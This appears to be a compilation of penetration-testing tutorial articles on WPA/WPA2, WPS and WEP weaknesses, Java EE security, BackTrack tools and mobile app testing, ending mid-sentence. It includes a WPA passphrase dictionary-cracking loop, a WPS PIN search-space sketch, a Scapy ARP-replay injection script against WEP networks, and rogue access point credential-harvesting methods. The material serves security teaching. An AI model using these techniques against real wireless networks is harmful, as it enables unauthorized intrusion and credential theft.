The main WPA/WPA2 flaw in PSK mode is the possibility of sniffing a whole 4-way handshake and brute-forcing the security key offline, without any interaction with the target WLAN. Generally, the security of a WLAN mostly depends on the complexity of the chosen PSK. Computing a PMK (short for pairwise master key), which is used in the 4-way handshake (refer to the handshake diagram), is a very time-consuming process compared to other computing operations, and computing hundreds of thousands of them can take very long. But if a short, low-complexity PSK is in use, a brute-force attack does not take long even on a not-so-powerful computer. If a key is complex and long enough, cracking it can take much longer, but there are still ways to speed up the process:

- Using powerful computers with CUDA (short for Compute Unified Device Architecture), which allows software to communicate directly with GPUs for computing. As GPUs are natively designed to perform mathematical operations, and do so much faster than CPUs, the cracking process works several times faster with CUDA.
- Using rainbow tables that contain pairs of various PSKs and their corresponding precomputed hashes. They save a lot of time for an attacker, because the cracking software just searches for a value from an intercepted 4-way handshake in the rainbow tables and, if there is a match, returns the key corresponding to the given PMK instead of computing PMKs for every possible character combination. Because WLAN SSIDs are used in the 4-way handshake analogously to a cryptographic salt, PMKs for the same key will differ for different SSIDs. This limits the application of rainbow tables to a number of the most popular SSIDs.
- Using cloud computing is another way to speed up the cracking process, but it usually costs additional money. The more computing power an attacker can rent (or obtain in other ways), the faster the process goes. There are also online cloud-cracking services available on the Internet for various cracking purposes, including cracking 4-way handshakes.

Furthermore, as with WEP, the more users know a WPA/WPA2 PSK, the greater the risk of compromise; that is why it is also not an option for big, complex corporate networks.
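The cost asymmetry mentioned above comes from the PMK derivation itself: WPA/WPA2-Personal stretches the passphrase with PBKDF2-HMAC-SHA1 over 4096 iterations, using the SSID as the salt. The sketch below (all values invented) shows the derivation plus a toy dictionary loop; a real cracker verifies each candidate against the MIC in the captured 4-way handshake rather than comparing PMKs directly, which is simplified away here.

    import hashlib

    def derive_pmk(passphrase: str, ssid: str) -> bytes:
        # WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 256 bits)
        return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

    ssid = "CoffeeShopWLAN"                            # hypothetical target SSID
    target_pmk = derive_pmk("Sup3rS3cretKey!", ssid)   # stand-in for handshake/MIC verification

    for candidate in ("password", "12345678", "Sup3rS3cretKey!"):
        if derive_pmk(candidate, ssid) == target_pmk:
            print("PSK found:", candidate)
            break

    # The SSID acts as a salt, so rainbow tables only help for popular SSIDs,
    # and the 4096 PBKDF2 rounds make every single guess deliberately expensive.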
WPA/WPA2 PSK mode provides a sufficient level of security for home and small office networks only when the key is long and complex enough and is used with a unique (or at least not popular) WLAN SSID.

Enterprise mode

As already mentioned in the previous section, using shared keys in itself poses a security risk, and in the case of WPA/WPA2 the protection relies heavily on key length and complexity. But there are several additional factors that should be taken into account when talking about enterprise WLAN infrastructure: flexibility, manageability, and accountability. Various components implement those functions in big networks, but in the context of our topic, we are mostly interested in two of them: AAA (short for authentication, authorization, and accounting) servers and wireless controllers.

WPA-Enterprise, or 802.1x mode, was designed for enterprise networks where a high security level is needed and the use of an AAA server is required. In most cases, a RADIUS server is used as the AAA server, and the following EAP (Extensible Authentication Protocol) types are supported with WPA/WPA2 to perform authentication (plus several more, depending on the wireless device):

- EAP-TLS
- EAP-TTLS/MSCHAPv2
- PEAPv0/EAP-MSCHAPv2
- PEAPv1/EAP-GTC
- PEAP-TLS
- EAP-FAST

You can find a simplified WPA-Enterprise authentication workflow in the diagram below.

[Figure: WPA-Enterprise authentication]

Depending on the EAP type configured, WPA-Enterprise can provide various authentication options. The most popular EAP type (based on our own experience in numerous pentests) is PEAPv0/MSCHAPv2, which is relatively easy to integrate with existing Microsoft Active Directory infrastructures and relatively easy to manage. But this type of WPA protection is also relatively easy to defeat by stealing and brute-forcing user credentials with a rogue access point.

The most secure EAP type (at least, when configured and managed correctly) is EAP-TLS, which employs certificate-based authentication for both users and authentication servers. During this type of authentication, clients also check the server's identity, and a successful attack with a rogue access point becomes possible only if there are errors in configuration or insecurities in certificate maintenance and distribution. It is recommended to protect enterprise WLANs with WPA-Enterprise in EAP-TLS mode with mutual client and server certificate-based authentication, but this type of security requires additional work and resources.

WPS

Wi-Fi Protected Setup (WPS) is not actually a security mechanism but a key exchange mechanism, which plays an important role in establishing connections between devices and access points. It was developed to make the process of connecting a device to an access point easier, but it turned out to be one of the biggest holes in modern WLANs if activated. WPS works with WPA/WPA2-PSK and allows connecting devices to WLANs with one of the following methods:

- PIN: Entering a PIN on a device. The PIN is usually printed on a sticker on the back of the Wi-Fi access point.
- Push button: Special buttons have to be pushed on both the access point and the client device during the connection phase. Buttons on devices can be physical or virtual.
- NFC: The client has to bring the device close to the access point to utilize the Near Field Communication technology.
- USB drive: The necessary connection information is exchanged between the access point and the device using a USB drive.
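The PIN method is the weak spot. As the next paragraph explains, the eight-digit PIN is validated in two halves and its last digit is only a checksum, so the effective search space is tiny; the sketch below (assuming the standard WPS checksum rule) shows just how tiny.

    def wps_checksum(pin7: int) -> int:
        # Checksum digit computed over the first seven digits of the WPS PIN.
        accum = 0
        while pin7:
            accum += 3 * (pin7 % 10)
            pin7 //= 10
            accum += pin7 % 10
            pin7 //= 10
        return (10 - accum % 10) % 10

    pin7 = 1234567                              # hypothetical first seven digits
    full_pin = pin7 * 10 + wps_checksum(pin7)   # the eighth digit is derived, not secret
    print(full_pin)                             # 12345670

    # The AP confirms the first four digits independently of the rest, so an
    # online attack needs at most 10**4 + 10**3 = 11,000 guesses instead of 10**8.
    print(10**4 + 10**3)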
Because WPS PINs are very short and their first and second parts are validated separately, an online brute-force attack on a PIN can be carried out in several hours, allowing an attacker to connect to the WLAN. Furthermore, the possibility of offline PIN cracking was found in 2014, which allows attackers to crack PINs in 1 to 30 seconds, though it works only on certain devices. You should also not forget that a person who is not permitted to connect to a WLAN but who can physically access a Wi-Fi router or access point can also read and use the PIN, or connect via the push-button method.

Getting familiar with the Wi-Fi attack workflow

In our opinion (and we hope you agree with us), planning and building a secure WLAN is not possible without an understanding of the various attack methods and their workflow. In this topic, we will give you an overview of how attackers work when they are hacking WLANs.

General Wi-Fi attack methodology

After refreshing our knowledge of wireless threats and Wi-Fi security mechanisms, let's have a look at the attack methodology used by attackers in the real world. Of course, as with all other types of network attack, wireless attack workflows depend on the situation and the targets, but they still align with the following general sequence in almost all cases.

The first step is planning. Normally, attackers need to plan what they are going to attack, how they can do it, which tools are necessary for the task, when is the best time and place to attack certain targets, and which configuration templates will be useful so that they can be prepared in advance. White-hat hackers or penetration testers need to set schedules and coordinate project plans with their customers, choose contact persons on the customer side, define project deliverables, and do other organizational work if required. As with every penetration testing project, the better a project is planned (and we can use the word "project" for black-hat hackers' tasks too), the better the chances of a successful result.

The next step is the survey. Getting as accurate and as much information about a target as possible is crucial for a successful hack, especially in uncommon network infrastructures. To hack a WLAN or its wireless clients, an attacker would normally collect at least the SSIDs or MAC addresses of access points and clients and information about the security type in use. It is also very helpful for an attacker to know whether WPS is enabled on a target access point. All that data allows attackers not only to set proper configurations and choose the right options for their tools, but also to choose appropriate attack types and conditions for a certain WLAN or Wi-Fi client. All collected information, especially non-technical information (for example, company and department names, brands, or employee names), can also become useful at the cracking phase for building dictionaries for brute-force attacks. Depending on the type of security and the attacker's luck, the data collected at the survey phase can even make the active attack phase unnecessary and allow an attacker to proceed directly to the cracking phase.

The active attacks phase involves active interaction between an attacker and the targets (WLANs and Wi-Fi clients). At this phase, attackers have to create the conditions necessary for a chosen attack type and execute it. This includes sending various Wi-Fi management and control frames and installing rogue access points. If an attacker's goal is to cause a denial of service in a target WLAN, such attacks are also executed at this phase.
Some of the active attacks are essential to successfully hack a WLAN, but some of them are intended just to speed up hacking and can be omitted to avoid raising alarms on any wireless intrusion detection/prevention systems (wIDPS) that may be installed in the target network. Thus, the active attacks phase can be called optional.

Cracking is another important phase, where an attacker cracks the 4-way handshakes, WEP data, NTLM hashes, and so on that were intercepted at the previous phases. There are plenty of free and commercial tools and services for this, including cloud cracking services. In case of success at this phase, an attacker obtains the target WLAN's secret(s) and can proceed with connecting to the WLAN, decrypting intercepted traffic, and so on.

The active attacking phase

Let's have a closer look at the most interesting parts of the active attack phase, WPA-PSK and WPA-Enterprise attacks, in the following topics.

WPA-PSK attacks

As both WPA and WPA2 are based on the 4-way handshake, attacking them doesn't differ: an attacker needs to sniff a 4-way handshake at the moment a connection is established between an access point and an arbitrary wireless client, and then brute-force the matching PSK. It does not matter whose handshake is intercepted, because all clients use the same PSK for a given target WLAN. Sometimes attackers would have to wait a long time until a device connects to the WLAN so that they can intercept a 4-way handshake, and of course they would like to speed up the process when possible. For that purpose, they force an already connected device to disconnect from the access point by sending control frames on behalf of the target access point (a deauthentication attack). When a device receives such a frame, it disconnects from the WLAN and tries to reconnect if the automatic reconnect feature is enabled (it is enabled by default on most devices), thus performing another 4-way handshake that can be intercepted by the attacker. Another way to hack a WPA-PSK protected network is to crack the WPS PIN, if WPS is enabled on the target WLAN.

Enterprise WLAN attacks

Attacking becomes a little more complicated if WPA-Enterprise security is in place, but it can be carried out in several minutes by a properly prepared attacker by imitating a legitimate access point with a RADIUS server and gathering user credentials for further analysis (cracking). To stage this attack, an attacker needs to install a rogue access point with an SSID identical to the target WLAN's SSID and set other parameters (such as the EAP type) to match the target WLAN, to increase the chances of success and reduce the probability of the attack being quickly detected.

Most user Wi-Fi devices choose an access point for a connection to a certain WLAN by signal strength: they connect to the one with the strongest signal. That is why an attacker needs to use a powerful Wi-Fi interface for the rogue access point, to override the signals from legitimate access points and make nearby devices connect to the rogue one. A RADIUS server used during such attacks should be able to record authentication data, NTLM hashes for example. From the user's perspective, being attacked in this way just looks like being unable to connect to a WLAN for an unknown reason, and it might not even be noticed if the user is not actively using the device at the moment and is just passing by the rogue access point. It is worth mentioning that classic physical security or wireless IDPS solutions are not always effective in such cases.
An attacker or a penetration tester can install a rogue access point outside the range of a target WLAN. This allows them to attack user devices without having to enter a physically controlled area (for example, an office building), making the rogue access point unreachable and invisible to wireless IDPS systems. Such a place could be a bus or train station, a parking lot, or a café where many users of the target WLAN go with their Wi-Fi devices.

Unlike WPA-PSK, with its single key shared between all WLAN users, the Enterprise mode employs personal credentials for each user, and those credentials can be more or less complex depending only on the particular user. That is why it is better to collect as many user credentials and hashes as possible, thus increasing the chances of successful cracking.

Summary

In this article, we looked at the security mechanisms that are used to secure access to wireless networks, their typical threats, and the common misconfigurations that lead to security breaches and allow attackers to harm corporate and private wireless networks. The brief attack methodology overview has given us a general understanding of how attackers normally act during wireless attacks and how they bypass common security mechanisms by abusing certain flaws in those mechanisms. We also saw that the most secure and preferable way to protect a wireless network is to use WPA2-Enterprise security along with mutual client and server authentication, which we are going to implement in our penetration testing lab.

Resources for Article:

Further resources on this subject:

- Pentesting Using Python [article]
- Advanced Wireless Sniffing [article]
- Wireless and Mobile Hacks [article]


Designing Secure Java EE Applications in GlassFish

Packt
31 May 2010
2 min read
Security is an orthogonal concern for an application, and we should assess it right from the start by reviewing the analysis we receive from business and functional analysts. Assessing the security requirements results in understanding the functionality we need to include in our architecture to deliver a secure application covering the necessary requirements. Security necessities can span a wide range of requirements, from simple authentication to several sub-systems, including an identity and access management system and transport security, which can involve encrypting data as well.

In this article series, we will develop a secure Java EE application based on Java EE and GlassFish capabilities. In the course of the series, we will cover the following topics:

- Analyzing Java EE application security requirements
- Including security requirements in Java EE application design
- Developing a secure business layer using EJBs
- Developing a secure presentation layer using JSP and Servlets
- Configuring deployment descriptors of Java EE applications
- Specifying a security realm for enterprise applications
- Developing a secure application client module
- Configuring the Application Client Container

Developing Secure Java EE Applications in GlassFish is the second part of this article series.

Understanding the sample application

The sample application that we are going to develop converts different length measurement units into each other. Our application converts meters to centimeters, millimeters, and inches. The application also stores usage statistics for later use. Guest users who prefer not to log in can only use the meter to centimeter conversion; any company employee can use the meter to centimeter and meter to millimeter conversions; and any of the company's managers can access the meter to inch conversion in addition to the other two. We should show a custom login page to comply with the site-wide look and feel. No encryption is required for communication between clients and our application, but we need to make sure that no one can intercept and steal the usernames and passwords provided by members. All members' identification information is stored in the company-wide directory server.

[Figure: High-level functionality of the sample application]

We have a login action and three conversion actions. Users can access some of them after logging in, and some can be accessed without logging in.
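To make those access rules concrete, here is a tiny illustrative sketch in Python (the real application enforces them declaratively with Java EE security roles and deployment descriptors rather than hand-written checks; the role and action names below are just stand-ins):

    # Role-to-conversion mapping described above.
    ALLOWED = {
        "guest":    {"meter_to_centimeter"},
        "employee": {"meter_to_centimeter", "meter_to_millimeter"},
        "manager":  {"meter_to_centimeter", "meter_to_millimeter", "meter_to_inch"},
    }

    def can_convert(role: str, conversion: str) -> bool:
        return conversion in ALLOWED.get(role, set())

    assert can_convert("guest", "meter_to_centimeter")
    assert not can_convert("employee", "meter_to_inch")
    assert can_convert("manager", "meter_to_inch")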

An Introduction to WEP

Packt
10 Aug 2015
4 min read
In this article, Marco Alamanni, author of the book Kali Linux Wireless Penetration Testing Essentials, explains that the WEP protocol was introduced with the original 802.11 standard as a means to provide authentication and encryption to wireless LAN implementations. It is based on the RC4 (Rivest Cipher 4) stream cipher with a preshared secret key (PSK) of 40 or 104 bits, depending on the implementation. A 24-bit pseudo-random Initialization Vector (IV) is concatenated with the preshared key to generate the per-packet key used by RC4 to produce the keystream for the actual encryption and decryption processes. Thus, the resulting per-packet key is 64 or 128 bits long. (For more resources related to this topic, see here.) In the encryption phase, the keystream is XORed with the plaintext data to obtain the encrypted data, while in the decryption phase the encrypted data is XORed with the keystream to obtain the plaintext data. The encryption process is shown in the following diagram: Attacks against WEP First of all, we must say that WEP is an insecure protocol and has been deprecated by the Wi-Fi Alliance. It suffers from various vulnerabilities related to the generation of the keystreams, to the use of IVs, and to the length of the keys. The IV is used to add randomness to the keystream, trying to avoid the reuse of the same keystream to encrypt different packets. This purpose has not been accomplished in the design of WEP, because the IV is only 24 bits long (with 2^24 = 16,777,216 possible values) and it is transmitted in cleartext within each frame. Thus, after a certain period of time (depending on the network traffic) the same IV, and consequently the same keystream, will be reused, allowing the attacker to collect the related ciphertexts and perform statistical attacks to recover the plaintexts and the key. The first well-known attack against WEP was the Fluhrer, Mantin, and Shamir (FMS) attack, back in 2001. The FMS attack relies on the way WEP generates the keystreams and on the fact that it also uses weak IVs to generate weak keystreams, making it possible for an attacker to collect a sufficient number of packets encrypted with these keystreams, analyze them, and recover the key. The number of IVs to be collected to complete the FMS attack is about 250,000 for 40-bit keys and 1,500,000 for 104-bit keys. The FMS attack has been enhanced by Korek, improving its performance. Andreas Klein found more correlations between the RC4 keystream and the key than the ones discovered by Fluhrer, Mantin, and Shamir, which can be used to crack the WEP key. In 2007, Pyshkin, Tews, and Weinmann (PTW) extended Andreas Klein's research and improved the FMS attack, significantly reducing the number of IVs needed to successfully recover the WEP key. Indeed, the PTW attack does not rely on weak IVs like the FMS attack does and is very fast and effective. It is able to recover a 104-bit WEP key with a success probability of 50 percent using less than 40,000 frames and with a probability of 95 percent with 85,000 frames. The PTW attack is the default method used by Aircrack-ng to crack WEP keys. Both the FMS and PTW attacks need to collect quite a large number of frames to succeed and can be conducted passively, sniffing the wireless traffic on the same channel as the target AP and capturing frames. The problem is that, in normal conditions, we will have to spend quite a long time passively collecting all the necessary packets for the attacks, especially with the FMS attack.
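To make the per-packet encryption step described above concrete, here is a small Python sketch: the 24-bit IV is concatenated with the preshared key, the result seeds RC4, and the generated keystream is XORed with the plaintext. The CRC-32 integrity check value (ICV) that real WEP appends before encryption is omitted for brevity, so treat this as an illustration of the scheme rather than an interoperable WEP implementation.

import os

def rc4_keystream(key, length):
    # Key-scheduling algorithm (KSA)
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # Pseudo-random generation algorithm (PRGA)
    out, i, j = [], 0, 0
    for _ in range(length):
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) % 256])
    return bytes(out)

def wep_encrypt(psk, plaintext):
    iv = os.urandom(3)                                   # 24-bit IV, transmitted in cleartext
    keystream = rc4_keystream(iv + psk, len(plaintext))  # per-packet key = IV || PSK
    return iv, bytes(p ^ k for p, k in zip(plaintext, keystream))

def wep_decrypt(psk, iv, ciphertext):
    keystream = rc4_keystream(iv + psk, len(ciphertext))
    return bytes(c ^ k for c, k in zip(ciphertext, keystream))

psk = b"\x0b\xad\xc0\xde\x01"                            # 40-bit key (WEP-64)
iv, ct = wep_encrypt(psk, b"hello, wireless world")
assert wep_decrypt(psk, iv, ct) == b"hello, wireless world"

Because the 3-byte IV is the only per-packet variation, keystreams inevitably repeat once enough frames are captured, which is exactly what the statistical attacks described above exploit.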
To accelerate the process, the idea is to re-inject frames in the network to generate traffic in response so that we could collect the necessary IVs more quickly. A type of frame that is suitable for this purpose is the ARP request, because the AP broadcasts it and each time with a new IV. As we are not associated with the AP, if we send frames to it directly, they are discarded and a de-authentication frame is sent. Instead, we can capture ARP requests from associated clients and retransmit them to the AP. This technique is called the ARP Request Replay attack and is also adopted by Aircrack-ng for the implementation of the PTW attack. Summary In this article, we covered the WEP protocol, the attacks that have been developed to crack the keys. Resources for Article: Further resources on this subject: Kali Linux – Wireless Attacks [article] What is Kali Linux [article] Penetration Testing [article]
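As a rough companion to the ARP Request Replay technique described in this article, the following Scapy sketch shows the general idea of capturing a likely WEP-encrypted ARP request and re-injecting it. The interface name wlan0mon, the frame-size heuristic, and the injection counts are assumptions for illustration only; this is what aireplay-ng automates far more robustly, and it requires a wireless adapter in monitor mode with injection support.

from scapy.all import sniff, sendp, Dot11WEP

BROADCAST = "ff:ff:ff:ff:ff:ff"

def looks_like_arp_request(pkt):
    # Heuristic: WEP data frames carrying ARP requests are short and addressed
    # to the broadcast MAC (in addr1 or addr3, depending on frame direction).
    return (pkt.haslayer(Dot11WEP)
            and BROADCAST in (pkt.addr1, pkt.addr3)
            and len(pkt) < 110)

# Capture one candidate frame sent by an associated client.
frames = sniff(iface="wlan0mon", lfilter=looks_like_arp_request, count=1, timeout=120)

if frames:
    # Re-inject the captured frame; the AP rebroadcasts each copy with a fresh IV,
    # quickly generating the traffic needed for the PTW attack.
    sendp(frames[0], iface="wlan0mon", count=50000, inter=0.001, verbose=False)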

FAQs on BackTrack 4

Packt
26 May 2011
8 min read
BackTrack 4: Assuring Security by Penetration Testing
Master the art of penetration testing with BackTrack

Q: Which version of BackTrack should be chosen? A: On the BackTrack website (http://www.backtrack-linux.org/downloads/) or using third-party mirrors (such as http://mirrors.rit.edu/backtrack/ or ftp://mirror.switch.ch/mirror/backtrack/), you will find two different formats of BackTrack version 4 (BackTrack 5 is out recently, and hence you may not find version 4 on the official site, but mirror sites like http://mirrors.rit.edu/backtrack/ or ftp://mirror.switch.ch/mirror/backtrack/ still provide it). One is an ISO image file. You can use this format if you want to burn it to a DVD, USB drive, or memory card (SD, SDHC, SDXC, and so on), or if you want to install BackTrack directly on your machine. The second format is a VMware image. If you want to use BackTrack in a virtual environment, you might want to use this image to speed up the installation and configuration.

Q: What is Portable BackTrack? A: You can also install BackTrack to a USB flash disk; we call this method Portable BackTrack. After you install it to the USB flash disk, you can easily boot into BackTrack from any machine with a USB port. The key advantage of this method compared to the Live DVD is that you can permanently save changes to the USB flash disk. When compared to the hard disk installation, this method is more portable and convenient. To create a portable BackTrack, you can use several tools, including UNetbootin (http://unetbootin.sourceforge.net), LinuxLive USB Creator (http://www.linuxliveusb.com), and LiveUSB MultiBoot (http://liveusb.info/dotclear/). These tools are available for the Windows, Linux/UNIX, and Mac operating systems.

Q: How to install BackTrack in a dual-boot environment? A: One of the resources that describes how to install BackTrack alongside other operating systems such as Windows XP can be found at: http://www.backtrack-linux.org/tutorials/dual-boot-install/.

Q: What types of penetration testing tools are available under BackTrack 4? A: BackTrack 4 comes with a number of security tools that can be used during the penetration testing process. These are categorized into the following:
Information gathering: This category contains tools that can be used to collect information regarding target DNS, routing, e-mail addresses, websites, mail servers, and so on. This information is usually gathered from publicly available resources such as the Internet, without touching the target environment.
Network mapping: This category contains tools that can be used to assess the live status of the target host, fingerprint the operating system, and probe and map the applications/services through various port scanning techniques.
Vulnerability identification: In this category you will find different sets of tools to scan for vulnerabilities in various IT technologies. It also contains tools to carry out manual and automated fuzz testing and to analyze the SMB and SNMP protocols.
Web application analysis: This category contains tools that can be used to assess the security of web servers and web applications.
Radio network analysis: To audit wireless networks, Bluetooth, and radio-frequency identification (RFID) technologies, you can use the tools in this category.
Penetration: This category contains tools that can be used to exploit the vulnerabilities found in the target environment.
Privilege escalation: After exploiting the vulnerabilities and gaining access to the target system, you can use the tools in this category to escalate your privileges to the highest level.
Maintaining access: Tools in this category will help you maintain access to the target machine. Note that you might need to escalate your privileges before attempting to install any of these tools on the compromised host.
Voice over IP (VOIP): In order to analyze the security of VOIP technology, you can utilize the tools in this category.
BackTrack 4 also contains tools that can be used for:
Digital forensics: In this category you can find several tools that can be used to perform digital forensics and investigation, such as acquiring a hard disk image, carving files, and analyzing a disk archive. Some practical forensic procedures require you to mount the hard drive in question and work with the files in read-only mode to preserve evidence integrity.
Reverse engineering: This category contains tools that can be used to debug, decompile, and disassemble executable files.

Q: Do I have to install additional tools with BackTrack 4? A: Although BackTrack 4 comes preloaded with many security tools, there are situations where you may need to add additional tools or packages because:
It is not included with the default BackTrack 4 installation.
You want to have the latest version of a particular tool, which is not available in the repository.
Our first suggestion is to try searching for the package in the software repository. If you find the package in the repository, please use that package, but if you can't find it, you can get the software package from the author's website and install it yourself. However, the former method is highly recommended to avoid any installation and configuration conflicts. You can search for tools in the BackTrack repository using the apt-cache search command. However, if you can't find the package in the repository and you are sure that the package will not cause any problems later on, you can install the package by yourself.

Q: Why do we use the WebSecurify tool? A: WebSecurify is a web security testing environment that can be used to find vulnerabilities in web applications. It can be used to check for the following vulnerabilities:
SQL injection
Local and remote file inclusion
Cross-site scripting
Cross-site request forgery
Information disclosure
Session security flaws
WebSecurify is readily available from the BackTrack repository. To install it you can use the apt-get command:
# apt-get install websecurify
You can search for tools in the BackTrack repository using the apt-cache search command.

Q: What are the types of penetration testing? A: Black-box testing: The black-box approach is also known as external testing. While applying this approach, the security auditor assesses the network infrastructure from a remote location and is not aware of any internal technologies deployed by the organization concerned. By employing a number of real-world hacker techniques and following organized test phases, it may reveal known and unknown sets of vulnerabilities that exist on the network. White-box testing: The white-box approach is also referred to as internal testing. An auditor involved in this kind of penetration testing process should be aware of all the internal and underlying technologies used by the target environment.
Hence, it opens a wide gate for an auditor to view and critically evaluate the security vulnerabilities with minimum possible efforts. Grey-Box testing: The combination of both types of penetration testing provides a powerful insight for internal and external security viewpoints. This combination is known as Grey-Box testing. The key benefit in devising and practicing a gray-box approach is a set of advantages posed by both approaches mentioned earlier.   Q: What is the difference between vulnerability assessment and penetration testing? A: A key difference between vulnerability assessment and penetration testing is that penetration testing goes beyond the level of identifying vulnerabilities and hooks into the process of exploitation, privilege escalation, and maintaining access to the target system. On the other hand, vulnerability assessment provides a broad view of any existing flaws in the system without measuring the impact of these flaws to the system under consideration. Another major difference between both of these terms is that the penetration testing is considerably more intrusive than vulnerability assessment and aggressively applies all the technical methods to exploit the live production environment. However, the vulnerability assessment process carefully identifies and quantifies all the vulnerabilities in a non-invasive manner. Penetration testing is an expensive service when compared to vulnerability assessment   Q: Which class of vulnerability is considered to be the worst to resolve? A: "Design vulnerability" takes a developer to derive the specifications based on the security requirements and address its implementation securely. Thus, it takes more time and effort to resolve the issue when compared to other classes of vulnerability.   Q: Which OSSTMM test type follows the rules of Penetration Testing? A: Double blind testing   Q: What is an Application Layer? A: Layer-7 of the Open Systems Interconnection (OSI) model is known as the “Application Layer”. The key function of this model is to provide a standardized way of communication across heterogeneous networks. A model is divided into seven logical layers, namely, Physical, Data link, Network, Transport, Session, Presentation, and Application. The basic functionality of the application layer is to provide network services to user applications. More information on this can be obtained from: http://en.wikipedia.org/wiki/OSI_model.   Q: What are the steps for BackTrack testing methodology? A: The illustration below shows the BackTrack testing process. Summary In this article we took a look at some of the frequently asked questions on BackTrack 4 so that we can use it more efficiently Further resources on this subject: Tips and Tricks on BackTrack 4 [Article] BackTrack 4: Target Scoping [Article] BackTrack 4: Security with Penetration Testing Methodology [Article] Blocking Common Attacks using ModSecurity 2.5 [Article] Telecommunications and Network Security Concepts for CISSP Exam [Article] Preventing SQL Injection Attacks on your Joomla Websites [Article]

Android and iOS Apps Testing at a Glance

Packt
02 Feb 2016
21 min read
In this article by Vijay Velu, the author of Mobile Application Penetration Testing, we will discuss the current state of mobile application security and the approach to testing for vulnerabilities in mobile devices. We will see the major players in the smartphone OS market and how attackers target users through apps. We will deep-dive into the architecture of Android and iOS to understand the platforms and their current security state, focusing specifically on the various vulnerabilities that affect apps. We will have a look at the Open Web Application Security Project (OWASP) standard used to classify these vulnerabilities. The readers will also get an opportunity to practice the security testing of these vulnerabilities by means of readily available vulnerable mobile applications. The article will also look at the step-by-step setup of the environment that's required to carry out security testing of mobile applications for Android and iOS. We will also explore the threats that may arise due to potential vulnerabilities and learn how to classify them according to their risks. (For more resources related to this topic, see here.) Smartphones' market share Understanding smartphones' market share will give us a clear picture of what cyber criminals are after and what could potentially be targeted. Mobile application developers can propose and publish their applications on the stores and be rewarded with a revenue share of the selling price. The following screenshot, taken from www.idc.com, provides us with the overall smartphone OS market in 2015: Since mobile applications are platform-specific, the majority of software vendors are forced to develop applications for all the available operating systems. Android operating system Android is an open source, Linux-based operating system for mobile devices (smartphones and tablet computers). It was developed by the Open Handset Alliance, which was led by Google and other companies. Android can be programmed in C/C++, but most application development is done in Java (Java accesses C libraries via JNI, which is short for Java Native Interface). iPhone operating system (iOS) iOS was developed by Apple Inc. and was originally released in 2007 for the iPhone, iPod Touch, and Apple TV. It is Apple's mobile version of the OS X operating system used in Apple computers; it is based on the UNIX-like Berkeley Software Distribution (BSD), and applications for it are programmed in Objective-C. Public Android and iOS vulnerabilities Before we proceed with the different types of vulnerabilities on Android and iOS, this section introduces you to Android and iOS as operating systems and covers various fundamental concepts that need to be understood to gain experience in mobile application security.
The following list summarizes the year-wise operating system releases:
2007/2008 - Android 1.0; iPhone OS 1, iPhone OS 2
2009 - Android 1.1, 1.5 (Cupcake), 2.0 (Eclair), 2.0.1 (Eclair); iPhone OS 3
2010 - Android 2.1 (Eclair), 2.2 (Froyo), 2.3-2.3.2 (Gingerbread); iOS 4
2011 - Android 2.3.4-2.3.7 (Gingerbread), 3.0 (Honeycomb), 3.1 (Honeycomb), 3.2 (Honeycomb), 4.0-4.0.2 (Ice Cream Sandwich), 4.0.3-4.0.4 (Ice Cream Sandwich); iOS 5
2012 - Android 4.1 (Jelly Bean), 4.2 (Jelly Bean); iOS 6
2013 - Android 4.3 (Jelly Bean), 4.4 (KitKat); iOS 7
2014 - Android 5.0 (Lollipop), 5.1 (Lollipop); iOS 8
2015 - iOS 9 (beta)
An interesting piece of research conducted by Hewlett Packard (HP), a software giant that tested more than 2,000 mobile applications from more than 600 companies, reported the following statistics (for more information, visit http://www8.hp.com/h20195/V2/GetPDF.aspx/4AA5-1057ENW.pdf):
97% of the applications that were tested access at least one private information source
86% of the applications failed to use simple binary-hardening protections against modern-day attacks
75% of the applications do not use proper encryption techniques when storing data on a mobile device
71% of the vulnerabilities resided on the web server
18% of the applications sent usernames and passwords over HTTP (of the remaining 85%, 18% implemented SSL/HTTPS incorrectly)
So, the key vulnerabilities in mobile applications arise due to a lack of security awareness, the "usability versus security trade-off" made by developers, excessive application permissions, and a lack of privacy concerns. Coupling this with a lack of sufficient application documentation leads to vulnerabilities that developers are not aware of. Usability versus security trade-off It is not possible for every developer to provide users with an application that offers both maximum security and maximum usability. Making any application secure and usable takes a lot of effort and analytical thinking. Mobile application vulnerabilities are broadly categorized as follows:
Insecure transmission of data: Either an application does not enforce any kind of encryption for data in transit on the transport layer, or the implemented encryption is insecure.
Insecure data storage: Apps may store data in a cleartext or obfuscated format, or hard-code keys on the mobile device. For example, an Exchange server configuration in an e-mail client on an Android device may store the username and password in cleartext format, which is easy to recover for any attacker if the device is rooted.
Lack of binary protection: Apps do not enforce any anti-reversing or debugging techniques.
Client-side vulnerabilities: Apps do not sanitize data provided from the client side, leading to multiple client-side injection attacks such as cross-site scripting, JavaScript injection, and so on.
Hard-coded passwords/keys: Apps may be designed in such a way that hard-coded passwords or private keys are stored on the device storage.
Leakage of private information: Apps may unintentionally leak private information. This could be due to the use of a particular framework and the obscurity assumptions of developers.
Android vulnerabilities In July 2015, a security company called Zimperium announced that it had discovered a high-risk vulnerability named Stagefright inside the Android operating system. They deemed it a unicorn in the world of Android risk, and it was practically demonstrated at one of the hacking conferences in the US on August 5, 2015.
More information can be found at https://blog.zimperium.com/stagefright-vulnerability-details-stagefright-detector-tool-released/; a public exploit is available at https://www.exploit-db.com/exploits/38124/. This made Google release security patches for the Android operating system; the flaw is believed to affect 95% of Android devices, which is an estimated 950 million users. The vulnerability is exploited through a particular media library and can let attackers take control of an Android device by sending specially crafted multimedia content, such as a Multimedia Messaging Service (MMS) message. If we take a look at the superuser application downloads from the Play Store, there are around 1 million to 5 million downloads. It can be assumed that a major portion of Android smartphones are rooted. The following graphs show the Android vulnerabilities from 2009 until September 2015. There are currently 54 reported vulnerabilities for the Google Android operating system (for more information, visit http://www.cvedetails.com/product/19997/Google-Android.html?vendor_id=1224). Every new feature introduced to the operating system in the form of applications acts as an additional entry point that allows cyber attackers or security researchers to circumvent and bypass the controls that were put in place. iOS vulnerabilities On June 18, 2015, a password-stealing vulnerability, also known as the Cross Application Reference Attack (XARA), was outlined for iOS and OS X. It cracked the keychain services on jailbroken and non-jailbroken devices. The vulnerability is similar to a cross-site request forgery attack in web applications. In spite of Apple's isolation protection and its App Store's security vetting, it was possible to circumvent the 